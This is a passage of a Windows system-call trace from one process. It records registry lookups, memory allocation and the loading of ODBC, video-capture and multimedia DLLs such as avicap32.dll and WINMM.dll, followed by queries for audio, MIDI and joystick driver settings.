 02536   748   NtUserRegisterWindowMessage  ( ("Shell IDList Array", ... ) , ... ) == 0xc074
 02537   748   NtUserRegisterWindowMessage  ( ("commdlg_help", ... ) , ... ) == 0xc075
 02538   748   NtUserRegisterWindowMessage  ( ("commdlg_help", ... ) , ... ) == 0xc075
 02539   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\odbc32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02540   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\BidInterface\Loader"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02541   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\MDAC"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02542   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02543   748   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 02544   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02545   748   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 17104896, 262144, ) == 0x0
 02546   748   NtAllocateVirtualMemory  (-1, 17104896, 0, 4096, 4096, 4, ... 17104896, 4096, ) == 0x0
 02547   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02548   748   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 18415616, 262144, ) == 0x0
 02549   748   NtAllocateVirtualMemory  (-1, 18415616, 0, 4096, 4096, 4, ... 18415616, 4096, ) == 0x0
 02550   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02551   748   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 18677760, 262144, ) == 0x0
 02552   748   NtAllocateVirtualMemory  (-1, 18677760, 0, 4096, 4096, 4, ... 18677760, 4096, ) == 0x0
 02553   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02554   748   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 18939904, 262144, ) == 0x0
 02555   748   NtAllocateVirtualMemory  (-1, 18939904, 0, 4096, 4096, 4, ... 18939904, 4096, ) == 0x0
 02556   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02557   748   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 02558   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02559   748   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 02560   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\odbcint.dll"}, 1236732, ... ) }, 1236732, ... ) == 0x0
 02561   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\odbcint.dll"}, 5, 96, ... 328, {status=0x0, info=1}, ) }, 5, 96, ... 328, {status=0x0, info=1}, ) == 0x0
 02562   748   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 328, ... 324, ) == 0x0
 02563   748   NtClose  (328, ... ) == 0x0
 02564   748   NtMapViewOfSection  (324, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x1090000), 0x0, 94208, ) == 0x0
 02565   748   NtClose  (324, ... ) == 0x0
 02566   748   NtUnmapViewOfSection  (-1, 0x1090000, ... ) == 0x0
 02567   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\odbcint.dll"}, 1237040, ... ) }, 1237040, ... ) == 0x0
 02568   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\odbcint.dll"}, 5, 96, ... 324, {status=0x0, info=1}, ) }, 5, 96, ... 324, {status=0x0, info=1}, ) == 0x0
 02569   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 324, ... 328, ) == 0x0
 02570   748   NtQuerySection  (328, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 02571   748   NtClose  (324, ... ) == 0x0
 02572   748   NtMapViewOfSection  (328, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x20000000), 0x0, 94208, ) == 0x0
 02573   748   NtClose  (328, ... ) == 0x0
 02574   748   NtQueryDefaultLocale  (1, 1238872, ... ) == 0x0
 02575   748   NtAllocateVirtualMemory  (-1, 17108992, 0, 4096, 4096, 4, ... 17108992, 4096, ) == 0x0
 02576   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "SOFTWARE"}, ... 328, ) }, ... 328, ) == 0x0
 02577   748   NtClose  (328, ... ) == 0x0
 02578   748   NtOpenKey  (0x20019, {24, 56, 0x40, 0, 0,  (0x20019, {24, 56, 0x40, 0, 0, "SOFTWARE\ODBC\ODBC.INI\ODBC"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02579   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "SOFTWARE\ODBC\ODBC.INI\ODBC"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02580   748   NtOpenKey  (0x20019, {24, 56, 0x40, 0, 0,  (0x20019, {24, 56, 0x40, 0, 0, "SOFTWARE\ODBC\ODBC.INI\ODBC"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02581   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "SOFTWARE\ODBC\ODBC.INI\ODBC"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02582   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\odbcint.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02583   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "avicap32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02584   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\avicap32.dll"}, 1240360, ... ) }, 1240360, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02585   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\avicap32.dll"}, 1240360, ... ) }, 1240360, ... ) == 0x0
 02586   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\avicap32.dll"}, 5, 96, ... 328, {status=0x0, info=1}, ) }, 5, 96, ... 328, {status=0x0, info=1}, ) == 0x0
 02587   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 328, ... 324, ) == 0x0
 02588   748   NtQuerySection  (324, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 02589   748   NtClose  (328, ... ) == 0x0
 02590   748   NtMapViewOfSection  (324, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x73b80000), 0x0, 73728, ) == 0x0
 02591   748   NtClose  (324, ... ) == 0x0
 02592   748   NtProtectVirtualMemory  (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0
 02593   748   NtProtectVirtualMemory  (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0
 02594   748   NtFlushInstructionCache  (-1, 1941442560, 732, ... ) == 0x0
 02595   748   NtProtectVirtualMemory  (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0
 02596   748   NtProtectVirtualMemory  (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0
 02597   748   NtFlushInstructionCache  (-1, 1941442560, 732, ... ) == 0x0
 02598   748   NtProtectVirtualMemory  (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0
 02599   748   NtProtectVirtualMemory  (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0
 02600   748   NtFlushInstructionCache  (-1, 1941442560, 732, ... ) == 0x0
 02601   748   NtProtectVirtualMemory  (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0
 02602   748   NtProtectVirtualMemory  (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0
 02603   748   NtFlushInstructionCache  (-1, 1941442560, 732, ... ) == 0x0
 02604   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "WINMM.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02605   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\WINMM.dll"}, 1239544, ... ) }, 1239544, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02606   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WINMM.dll"}, 1239544, ... ) }, 1239544, ... ) == 0x0
 02607   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WINMM.dll"}, 5, 96, ... 324, {status=0x0, info=1}, ) }, 5, 96, ... 324, {status=0x0, info=1}, ) == 0x0
 02608   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 324, ... 328, ) == 0x0
 02609   748   NtQuerySection  (328, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 02610   748   NtClose  (324, ... ) == 0x0
 02611   748   NtMapViewOfSection  (328, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76b40000), 0x0, 184320, ) == 0x0
 02612   748   NtClose  (328, ... ) == 0x0
 02613   748   NtProtectVirtualMemory  (-1, (0x76b41000), 860, 4, ... (0x76b41000), 4096, 32, ) == 0x0
 02614   748   NtProtectVirtualMemory  (-1, (0x76b41000), 4096, 32, ... (0x76b41000), 4096, 4, ) == 0x0
 02615   748   NtFlushInstructionCache  (-1, 1991512064, 860, ... ) == 0x0
 02616   748   NtProtectVirtualMemory  (-1, (0x76b41000), 860, 4, ... (0x76b41000), 4096, 32, ) == 0x0
 02617   748   NtProtectVirtualMemory  (-1, (0x76b41000), 4096, 32, ... (0x76b41000), 4096, 4, ) == 0x0
 02618   748   NtFlushInstructionCache  (-1, 1991512064, 860, ... ) == 0x0
 02619   748   NtProtectVirtualMemory  (-1, (0x76b41000), 860, 4, ... (0x76b41000), 4096, 32, ) == 0x0
 02620   748   NtProtectVirtualMemory  (-1, (0x76b41000), 4096, 32, ... (0x76b41000), 4096, 4, ) == 0x0
 02621   748   NtFlushInstructionCache  (-1, 1991512064, 860, ... ) == 0x0
 02622   748   NtProtectVirtualMemory  (-1, (0x76b41000), 860, 4, ... (0x76b41000), 4096, 32, ) == 0x0
 02623   748   NtProtectVirtualMemory  (-1, (0x76b41000), 4096, 32, ... (0x76b41000), 4096, 4, ) == 0x0
 02624   748   NtFlushInstructionCache  (-1, 1991512064, 860, ... ) == 0x0
 02625   748   NtProtectVirtualMemory  (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0
 02626   748   NtProtectVirtualMemory  (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0
 02627   748   NtFlushInstructionCache  (-1, 1941442560, 732, ... ) == 0x0
 02628   748   NtProtectVirtualMemory  (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0
 02629   748   NtProtectVirtualMemory  (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0
 02630   748   NtFlushInstructionCache  (-1, 1941442560, 732, ... ) == 0x0
 02631   748   NtProtectVirtualMemory  (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0
 02632   748   NtProtectVirtualMemory  (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0
 02633   748   NtFlushInstructionCache  (-1, 1941442560, 732, ... ) == 0x0
 02634   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "MSVFW32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02635   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\MSVFW32.dll"}, 1239544, ... ) }, 1239544, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02636   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\MSVFW32.dll"}, 1239544, ... ) }, 1239544, ... ) == 0x0
 02637   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\MSVFW32.dll"}, 5, 96, ... 328, {status=0x0, info=1}, ) }, 5, 96, ... 328, {status=0x0, info=1}, ) == 0x0
 02638   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 328, ... 324, ) == 0x0
 02639   748   NtQuerySection  (324, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 02640   748   NtClose  (328, ... ) == 0x0
 02641   748   NtMapViewOfSection  (324, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x75a70000), 0x0, 135168, ) == 0x0
 02642   748   NtClose  (324, ... ) == 0x0
 02643   748   NtProtectVirtualMemory  (-1, (0x75a71000), 1008, 4, ... (0x75a71000), 4096, 32, ) == 0x0
 02644   748   NtProtectVirtualMemory  (-1, (0x75a71000), 4096, 32, ... (0x75a71000), 4096, 4, ) == 0x0
 02645   748   NtFlushInstructionCache  (-1, 1973882880, 1008, ... ) == 0x0
 02646   748   NtProtectVirtualMemory  (-1, (0x75a71000), 1008, 4, ... (0x75a71000), 4096, 32, ) == 0x0
 02647   748   NtProtectVirtualMemory  (-1, (0x75a71000), 4096, 32, ... (0x75a71000), 4096, 4, ) == 0x0
 02648   748   NtFlushInstructionCache  (-1, 1973882880, 1008, ... ) == 0x0
 02649   748   NtProtectVirtualMemory  (-1, (0x75a71000), 1008, 4, ... (0x75a71000), 4096, 32, ) == 0x0
 02650   748   NtProtectVirtualMemory  (-1, (0x75a71000), 4096, 32, ... (0x75a71000), 4096, 4, ) == 0x0
 02651   748   NtFlushInstructionCache  (-1, 1973882880, 1008, ... ) == 0x0
 02652   748   NtProtectVirtualMemory  (-1, (0x75a71000), 1008, 4, ... (0x75a71000), 4096, 32, ) == 0x0
 02653   748   NtProtectVirtualMemory  (-1, (0x75a71000), 4096, 32, ... (0x75a71000), 4096, 4, ) == 0x0
 02654   748   NtFlushInstructionCache  (-1, 1973882880, 1008, ... ) == 0x0
 02655   748   NtProtectVirtualMemory  (-1, (0x75a71000), 1008, 4, ... (0x75a71000), 4096, 32, ) == 0x0
 02656   748   NtProtectVirtualMemory  (-1, (0x75a71000), 4096, 32, ... (0x75a71000), 4096, 4, ) == 0x0
 02657   748   NtFlushInstructionCache  (-1, 1973882880, 1008, ... ) == 0x0
 02658   748   NtProtectVirtualMemory  (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0
 02659   748   NtProtectVirtualMemory  (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0
 02660   748   NtFlushInstructionCache  (-1, 1941442560, 732, ... ) == 0x0
 02661   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WINMM.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02662   748   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 324, ) == 0x0
 02663   748   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 328, ) == 0x0
 02664   748   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 332, ) == 0x0
 02665   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\DRIVERS32"}, ... 336, ) }, ... 336, ) == 0x0
 02666   748   NtQueryValueKey  (336,  (336, "wave", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "wave", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02667   748   NtAllocateVirtualMemory  (-1, 0, 0, 524280, 8192, 4, ... 19202048, 524288, ) == 0x0
 02668   748   NtAllocateVirtualMemory  (-1, 19202048, 0, 4096, 4096, 4, ... 19202048, 4096, ) == 0x0
 02669   748   NtQueryValueKey  (336,  (336, "wave", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "wave", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02670   748   NtQueryValueKey  (336,  (336, "wave1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "wave1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02671   748   NtQueryValueKey  (336,  (336, "wave1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "wave1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02672   748   NtQueryValueKey  (336,  (336, "wave2", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02673   748   NtQueryValueKey  (336,  (336, "wave3", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02674   748   NtQueryValueKey  (336,  (336, "wave4", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02675   748   NtQueryValueKey  (336,  (336, "wave5", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02676   748   NtQueryValueKey  (336,  (336, "wave6", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02677   748   NtQueryValueKey  (336,  (336, "wave7", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02678   748   NtQueryValueKey  (336,  (336, "wave8", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02679   748   NtQueryValueKey  (336,  (336, "wave9", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02680   748   NtQueryValueKey  (336,  (336, "midi", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "midi", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02681   748   NtQueryValueKey  (336,  (336, "midi", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "midi", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02682   748   NtQueryValueKey  (336,  (336, "midi1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "midi1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02683   748   NtQueryValueKey  (336,  (336, "midi1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "midi1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02684   748   NtQueryValueKey  (336,  (336, "midi2", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02685   748   NtQueryValueKey  (336,  (336, "midi3", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02686   748   NtQueryValueKey  (336,  (336, "midi4", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02687   748   NtQueryValueKey  (336,  (336, "midi5", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02688   748   NtQueryValueKey  (336,  (336, "midi6", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02689   748   NtQueryValueKey  (336,  (336, "midi7", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02690   748   NtQueryValueKey  (336,  (336, "midi8", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02691   748   NtQueryValueKey  (336,  (336, "midi9", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02692   748   NtQueryTimerResolution  (... 156250, 10000, 156250, ) == 0x0
 02693   748   NtQueryValueKey  (336,  (336, "aux", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "aux", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02694   748   NtQueryValueKey  (336,  (336, "aux", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "aux", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02695   748   NtQueryValueKey  (336,  (336, "aux1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "aux1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02696   748   NtQueryValueKey  (336,  (336, "aux1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "aux1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02697   748   NtQueryValueKey  (336,  (336, "aux2", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02698   748   NtQueryValueKey  (336,  (336, "aux3", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02699   748   NtQueryValueKey  (336,  (336, "aux4", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02700   748   NtQueryValueKey  (336,  (336, "aux5", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02701   748   NtQueryValueKey  (336,  (336, "aux6", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02702   748   NtQueryValueKey  (336,  (336, "aux7", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02703   748   NtQueryValueKey  (336,  (336, "aux8", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02704   748   NtQueryValueKey  (336,  (336, "aux9", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02705   748   NtUserRegisterWindowMessage  ( ("MSJSTICK_VJOYD_MSGSTR", ... ) , ... ) == 0xc076
 02706   748   NtOpenKey  (0xf003f, {24, 16, 0x40, 0, 0,  (0xf003f, {24, 16, 0x40, 0, 0, "System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm"}, ... 340, ) }, ... 340, ) == 0x0
 02707   748   NtQueryValueKey  (340,  (340, "wheel", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (340, "wheel", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 02708   748   NtClose  (340, ... ) == 0x0
 02709   748   NtCreateEvent  (0x1f0003, {24, 48, 0x80, 0, 0,  (0x1f0003, {24, 48, 0x80, 0, 0, "DINPUTWINMM"}, 0, 0, ... ) }, 0, 0, ... ) == STATUS_ACCESS_DENIED
 02710   748   NtQueryValueKey  (336,  (336, "mixer", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "mixer", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
